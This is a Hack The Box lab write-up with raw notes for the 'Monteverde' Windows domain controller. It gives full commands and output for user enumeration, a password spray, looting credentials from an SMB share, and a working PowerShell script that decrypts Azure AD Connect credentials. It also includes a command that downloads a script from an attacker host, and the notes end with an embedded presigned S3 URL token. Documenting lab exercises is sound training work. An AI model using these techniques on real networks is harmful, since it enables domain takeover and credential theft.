Hack The Box · Lab
MediumWindowsActive DirectoryPassword Attacks

Target: 10.10.10.172 | Difficulty: Medium | OS: Windows | Domain: MEGABANK.LOCAL

Environment Setup

export IP=10.10.10.172
export DOMAIN=MEGABANK.LOCAL
echo "$IP monteverde.megabank.local megabank.local" | sudo tee -a /etc/hosts

Step 1 — Port Scan & Service Enumeration

Why: Identify exposed services and attack surface on this Domain Controller.

nmap -sCV -p- --min-rate 5000 -oN monteverde.nmap $IP

Output:

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws

Key findings: Pure DC profile, no HTTP. SMB + WinRM exposed. Start with RPC null session to enumerate domain users.

Step 2 — RPC Null Session & User Enumeration

Why: Anonymous RPC binds often allow domain user enumeration on misconfigured DCs — a full user list enables targeted attacks.

rpcclient -U "" -N $IP -c "enumdomusers"

Output:

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0x642]
user:[svc-ata] rid:[0x643]
user:[svc-bexec] rid:[0x644]
user:[svc-netapp] rid:[0x645]
user:[dgalanos] rid:[0x646]
user:[roleary] rid:[0x647]
user:[smorgan] rid:[0x648]
# Extract usernames to file
rpcclient -U "" -N $IP -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v '0x' | tr -d '[]' > users.txt

Key findings: 12 domain users enumerated. Service accounts (svc-*) and AAD_987d7f2f57d2 (Azure AD Connect) confirm Azure AD Connect is deployed.

Step 3 — Password Spray (Username = Password)

Why: Service/batch accounts are frequently provisioned with the username as the initial password — a common low-effort misconfiguration.

crackmapexec smb $IP -u users.txt -p users.txt --no-bruteforce --continue-on-success

Output:

SMB  10.10.10.172  445  MONTEVERDE  [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs

Key findings: SABatchJobs:SABatchJobs — username equals password. Valid domain credentials obtained.

Step 4 — SMB Enumeration as SABatchJobs

Why: Authenticated SMB access may expose user home directories or Azure-related shares with sensitive configuration files.

smbclient -L //$IP -U 'SABatchJobs%SABatchJobs'

Output:

Sharename       Type  Comment
ADMIN$          Disk  Remote Admin
azure_uploads   Disk
C$              Disk  Default share
E$              Disk  Default share
IPC$            IPC   Remote IPC
NETLOGON        Disk  Logon server share
SYSVOL          Disk  Logon server share
users$          Disk
# Browse users$ share
smbclient //$IP/users$ -U 'SABatchJobs%SABatchJobs'
smb: \> ls
# mhope directory present
smb: \> cd mhope
smb: \mhope\> ls
# azure.xml found
smb: \mhope\> get azure.xml
cat azure.xml

Output:

<Objs Version="1.1.0.1" ...>
  <Obj ...>
    <TN refId="0"><T>Microsoft.Azure.ActiveDirectory.Synchronization.Framework...</T></TN>
    <ToString>Microsoft.Azure....</ToString>
    <Props>
      <S N="Password">4n0therD4y@n0th3r$</S>
      <S N="UserName">MEGABANK\mhope</S>
    </Props>
  </Obj>
</Objs>

Key findings: PowerShell credential export file found in mhope's home directory. Cleartext credentials: mhope:4n0therD4y@n0th3r$.

Step 5 — WinRM Access as mhope

Why: Port 5985 is open — test if mhope is in Remote Management Users.

evil-winrm -i $IP -u mhope -p '4n0therD4y@n0th3r$'

Output:

Evil-WinRM shell v3.x
*Evil-WinRM* PS C:\Users\mhope\Documents>
type C:\Users\mhope\Desktop\user.txt

Key findings: Shell as mhope. User flag captured.

Step 6 — Identify Privilege via Group Membership

Why: Enumerate mhope's group memberships to understand available privilege escalation paths.

*Evil-WinRM* PS> whoami /groups

Output:

GROUP INFORMATION
MEGABANK\Azure Admins

Key findings: mhope is in Azure Admins — the group associated with Azure AD Connect service account management. Azure AD Connect stores encrypted Domain Admin credentials to synchronize AD with Azure — extractable if we control an Azure Admin account.

Step 7 — Azure AD Connect Credential Extraction

Why: Azure AD Connect stores encrypted credentials for its synchronization service account (which typically has DCSync rights) in a local SQL database. As Azure Admin, mhope can query ADSync and decrypt the stored credentials.

# Confirm Azure AD Connect service and SQL instance
*Evil-WinRM* PS> Get-Service ADSync
*Evil-WinRM* PS> sqlcmd -S LOCALHOST -Q "SELECT name FROM sys.databases"
# ADSync database present

# Upload and run the Azure AD Connect credential extraction script
# Based on @_xpn_ technique (blog.xpnsec.com/azuread-connect-for-redteam)
*Evil-WinRM* PS> Invoke-WebRequest http://10.10.14.x/azuread_decrypt_msol.ps1 -OutFile azuread_decrypt.ps1
*Evil-WinRM* PS> . .\azuread_decrypt.ps1
# Core extraction technique (manual approach):
$client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList `
  "Server=127.0.0.1;Database=ADSync;Integrated Security=True"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id    = $reader.GetInt32(0)
$instance  = $reader.GetGuid(1)
$entropy   = $reader.GetGuid(2)
$reader.Close()

$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type='AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypt  = $reader.GetString(1)
$reader.Close()

# Decrypt using DPAPI
Add-Type -AssemblyName System.Security
$password_bytes  = [Convert]::FromBase64String(($crypt | Select-Xml '//encrypted-attributes/attribute[@name="password"]').Node.InnerText)
$decrypted_bytes = [Security.Cryptography.ProtectedData]::Unprotect($password_bytes, $entropy.ToByteArray(), [Security.Cryptography.DataProtectionScope]::LocalMachine)
[Text.Encoding]::Unicode.GetString($decrypted_bytes)

Output:

administrator
d0m@in4dminyeah!

Key findings: Azure AD Connect DPAPI-encrypted credentials decrypted: administrator:d0m@in4dminyeah!.

Step 8 — WinRM as Administrator → Domain Admin

Why: Use the extracted administrator credentials to get a Domain Admin shell.

evil-winrm -i $IP -u administrator -p 'd0m@in4dminyeah!'

Output:

*Evil-WinRM* PS C:\Users\Administrator\Documents>
type C:\Users\Administrator\Desktop\root.txt

Key findings: Full Domain Admin access. Root flag captured.

Credentials

Username Password Source
SABatchJobs SABatchJobs Password spray (username = password)
mhope 4n0therD4y@n0th3r$ azure.xml on users$ SMB share
administrator d0m@in4dminyeah! Azure AD Connect DPAPI decrypt

Full Attack Chain

RPC Null Session → rpcclient enumdomusers
        │
        ▼ Password spray (username = password)
SABatchJobs:SABatchJobs
        │
        ▼ smbclient users$ share → mhope/azure.xml
mhope:4n0therD4y@n0th3r$
        │
        ▼ evil-winrm :5985
USER FLAG
        │
        ▼ whoami /groups → Azure Admins
Azure AD Connect installed (AAD_987d7f2f57d2)
        │
        ▼ SQL query ADSync → mms_server_configuration + mms_management_agent
DPAPI Decrypt encrypted_configuration
        │
        ▼ Extract domain admin credentials
administrator:d0m@in4dminyeah!
        │
        ▼ evil-winrm :5985
DOMAIN ADMIN / ROOT FLAG

© 0xNRG — Monteverde pwned — 2020-06-13

notes

NMAP

```shell
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49693/tcp open  unknown
```

SMB

Anon Auth Success but null


Guest deactivated

LDAP

Anon Auth Success


Anon Users Enum


```shell
AAD_987d7f2f57d2 # 
AD Connect?

mhope
SABatchJobs # 
Batch Jobs?

svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
```


Windapsearch


    lets see who’s in `Remote Management Group`


    ```shell
    CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
    ```

Enum4linux

No account lockout

Password Spray

One hit


```shell
SABatchJobs:SABatchJobs
```

SMB AUTH w/ creds success

```shell
Share Permissions Remark
ーーーーーー ------
ADMIN$               Remote Admin
azure_uploads READ
C$                   Default share
E$                   Default share
IPC$          READ   Remote IPC
NETLOGON      READ   Logon server share
SYSVOL        READ   Logon server share
users$        READ
```


Found File


```shell
//10.10.10.172/users$/mhope/azure.xml
```


```shell
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
```


Password found!


```shell
4n0therD4y@n0th3r$
```


As it was found in mhope’s folder, let’s asume its his.


Success


```shell
[+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ 
(Pwn3d!)
```

EVIL-WINRM as mhope

`mhope` is a member of `Azure Admins`


Also some interesting apps


According to Microsoft, the service responsible for syncing local AD to Azure AD is `ADSync`


Get-Proccess, tasklist results in access denied.


Invoking with PS also denied.


```shell
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:38 PM                Microsoft SQL Server
```


Registry works tho:


```shell
Get-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ADSync
```


And we can see an executable


```shell
ImagePath        : "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe"
```


We can issue this to obtain file and product version


```shell
Get-ItemProperty -Path "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe" | Format-list -Property * -Force
```


Let’s have a look at internal portsmaps


```shell
Active Connections
  Proto  Local Address          Foreign Address        State           PID      Offload State
  TCP    10.10.10.172:1433
```


MSSQL apparently


Let´s extract `$key_id` , `$instance_id` & `$entropy` from database manually.


```shell
C:\Program Files> sqlcmd -S MONTEVERDE -Q "use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration"
Changed database context to 'ADSync'.
instance_id                          keyset_id   entropy
------------------------------------ ----------- ------------------------------------
1852B527-DD4F-4ECF-B541-EFCCBFF29E31           1 194EC2FC-F186-46CF-B44D-071EB61F49CD

(1 rows affected)
```


We can use:


[https://blog.xpnsec.com/azuread-connect-for-redteam/](https://blog.xpnsec.com/azuread-connect-for-redteam/)


for extraction of creds


![image.png](https://prod-files-secure.s3.us-west-2.amazonaws.com/25f83ed0-ddc8-8143-b578-00031f210370/eceb43c3-9443-44ab-82ba-504f15a518f2/image.png?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAZI2LB466RETUPUMV%2F20260707%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20260707T064555Z&X-Amz-Expires=3600&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEJ7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMiJIMEYCIQD21NRUA5Jo%2FYB8Y2rhe0FsTq%2BkRpZJI6tn78yZ8c8Q2wIhAPf2HP3cIrvy1KXzqBc3k2il9CV1bYH6WSQaZw7K5R3VKv8DCGcQABoMNjM3NDIzMTgzODA1IgxiWHRgiEy9294w8BAq3ANnn6o1xOe%2BuBig5HK5DHJAFbdPJzq0Zkhi7KbvXic7WBU2y%2FJhE1LMKMfySah7sOnmqVyZ8nrcOighypaH3gbX4ZCuRv1rtZDSR9I9KugOxXv9zp7B3kqQcZ6oN3Sa5TaBJC5G5%2BlxtjQd8jJjPzTNPX%2FEaUyIJBM6WiDvw5aOfDdMQDzoCLtzPRk72RmxrmXcPpwOCuwxdTihMXv%2FBGoKZvWBi6A1vJwjpw01YyQC64keFof8XeuimXdIxxpCbwCp9VOzVpYq4FGI%2B5ghOSqEvHkH6yJu9pU7X8KYGoa0HJEF8Foag31GQcX5c9nG%2FKa0RGtmzQ%2B9NtYq2UskNjbkt7uUzg2kCCAODtzSbuJKRQFdbtk31h%2Fw4WNLtX5xZ%2FlWJNaPI%2FeEysDgf05Kbb6ANfn6LwxlljTB6Epq2HRN71Ts%2FeiNJUQjOWepgA88YSQCjreWkgjGx59dgkqkEdKYLrlpKvwprsRIhyc%2FC7Q8Zzx5YZsfV6%2BdUF%2Fvu8JiPYpOJ1i2Uemp%2BrHJO8XRWVe6QicfMZFFmygt%2FeUxe10q0ThXNNqT4jkFSiAHqY9N0r8v5StKYBzPK4zpM7Ma%2FR%2Fwg%2B8K9MvnXqAQOx6O6iw4oW6EcnKZpYMBswYTGzDksbLSBjqkAWn26UdPcRTpfcPLnpsVEk1ggDrmsJwV3rbjVmQat%2FLF2Gm1KPBfZsSZWSSjhjvAwlJvVgYYN93Gk6NCQAdomoVAix3JGwU%2FvEh6kkJXmOV69m1rqbc757Q93rHg3jTC9CennllLJuWCPUy61BkVHg6VsVhFC0t7Q2Kce2zD9tUjQwLtHhhQJ7SH5jGBEcmVtEA5yqX1ERh2MfOIDDcYgFHAAr%2BQ&X-Amz-Signature=66a2da65fd87fba46c4e4cef5b0723bd520284587fe381f14092a108dddae336&X-Amz-SignedHeaders=host&x-amz-checksum-mode=ENABLED&x-id=GetObject)

image.png